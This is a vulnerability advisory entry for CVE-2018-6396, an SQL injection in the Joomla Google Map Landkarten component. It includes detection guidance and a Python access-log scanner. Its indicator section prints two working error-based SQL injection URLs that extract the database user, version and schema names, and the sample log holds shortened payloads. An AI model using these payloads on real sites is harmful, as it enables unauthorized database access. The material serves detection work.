CVE-2018-6396
published 2018-02-17

Priority: P271 · critical · 9.8 (CVSS 3.0)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EXPLOIT
EPSS: 23.97% (97.6th percentile)
SQL Injection exists in the Google Map Landkarten through 4.2.3 component for Joomla! via the cid or id parameter in a layout=form_markers action, or the map parameter in a layout=default action.

Affected

1 range

Vendor | Product | Version range | Fixed in
google_map_landkarten_project | google_map_landkarten | <= 4.2.3 | -

Detection & IOCs (extracted from sources)

url: index.php?option=com_gmap&view=gm_markers&tmpl=component&layout=form_markers&cid=1' AND (SELECT 6142 FROM(SELECT COUNT(*),CONCAT(0x494853414e2053454e43414e,(SELECT (ELT(6142=6142,1))),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ptYA&id=1&format=raw
url: index.php?option=com_gmap&view=gm_markers&tmpl=component&layout=form_markers&cid=1&id=1+AND+EXTRACTVALUE(4855,CONCAT(0x5c,(SELECT+GROUP_CONCAT(schema_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.SCHEMATA),(SELECT+(ELT(4855=4855,1))),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION())))&format=raw
other: option=com_gmap
  • Detect SQLi attempts against the com_gmap Joomla component by monitoring requests containing 'option=com_gmap' combined with 'layout=form_markers' and SQL payloads in the 'cid' or 'id' parameters (e.g. single-quote, AND, SELECT, EXTRACTVALUE, CONCAT keywords).
  • Also monitor requests with 'option=com_gmap' and 'layout=default' for SQL injection payloads in the 'map' parameter.
  • Error-based SQLi technique observed: FLOOR(RAND(0)*2) with GROUP BY on INFORMATION_SCHEMA.PLUGINS triggers a '1062 Duplicate entry' MySQL error — monitor web server/application logs for this error string as evidence of successful exploitation.
  • XPATH error-based SQLi technique observed: EXTRACTVALUE() with CONCAT(0x5c,...) triggers a '1105 XPATH syntax error' — monitor application/DB logs for this error string as evidence of active exploitation.
  • The exploit uses 'view=gm_markers&tmpl=component&format=raw' in the request — this combination is specific to the vulnerable code path and can be used as a high-fidelity filter in WAF or SIEM rules.
  • The exploit URLs use 'localhost' as the target host — in real-world detections, replace with the actual target hostname/IP. The SQL payloads and parameter names (cid, id, map) are the stable, host-independent indicators.
  • Vulnerability affects Google Map Landkarten versions up to and including 4.2.3 for Joomla!. Installations running version 4.2.3 or earlier should be treated as unpatched.
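
One way to turn the request-side indicators above into an access-log filter, as an added example that is not part of the original entry or its sources: it URL-decodes each request's query string and flags com_gmap requests whose cid, id or map value carries the listed SQL tokens. The log lines, the IP address and the names classify, scan and SAMPLE_LOG are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Indicators named in the bullets above: a single quote or these SQL keywords.
SQL_TOKENS = re.compile(r"'|\b(?:AND|SELECT|EXTRACTVALUE|CONCAT(?:_WS)?)\b", re.I)
# layout value -> parameters the entry names as injectable for that layout
WATCHED = {"form_markers": ("cid", "id"), "default": ("map",)}
# Parameter combination the entry calls specific to the vulnerable code path
RAW_PATH = {"view": "gm_markers", "tmpl": "component", "format": "raw"}
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def classify(url):
    """Return a finding for a suspicious com_gmap request, or None."""
    q = parse_qs(urlsplit(url).query, keep_blank_values=True)  # decodes %xx and '+'
    if "com_gmap" not in q.get("option", []):
        return None
    hits = sorted({p for layout in q.get("layout", [])
                   for p in WATCHED.get(layout, ())
                   for v in q.get(p, []) if SQL_TOKENS.search(v)})
    if not hits:
        return None
    raw_path = all(v in q.get(k, []) for k, v in RAW_PATH.items())
    return {"params": hits, "raw_path": raw_path}

def scan(lines):
    """Yield-style helper: findings with 1-based line numbers for matching log lines."""
    findings = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST.search(line)
        finding = classify(match.group(1)) if match else None
        if finding:
            findings.append({"line": number, **finding})
    return findings

# Constructed sample log (combined-log style); payloads are shortened stand-ins.
BASE = "/index.php?option=com_gmap&view=gm_markers&tmpl=component&layout=form_markers"
def _line(path, status=200):
    return f'198.51.100.9 - - [01/Mar/2018:10:00:00 +0000] "GET {path} HTTP/1.1" {status} 512'

SAMPLE_LOG = [
    _line(BASE + "&cid=3&id=7&format=raw"),                               # benign
    _line(BASE + "&cid=1%27%20AND%20(SELECT%201)&id=1&format=raw", 500),  # cid
    _line(BASE + "&cid=1&id=1+AND+EXTRACTVALUE(1,1)&format=raw", 500),    # id
    _line("/index.php?option=com_gmap&layout=default&map=1%27+AND+1=1"),  # map
    _line("/index.php?option=com_search&searchword=select+and+concat"),   # other component
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Matching on decoded parameter values rather than the raw request line catches both the percent-encoded and the plus-encoded form of the same payload; findings with raw_path set to True are the ones that also match the view/tmpl/format combination described above.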

CVSS provenance

nvd | v3.0 | 9.8 | CRITICAL | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd | v2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P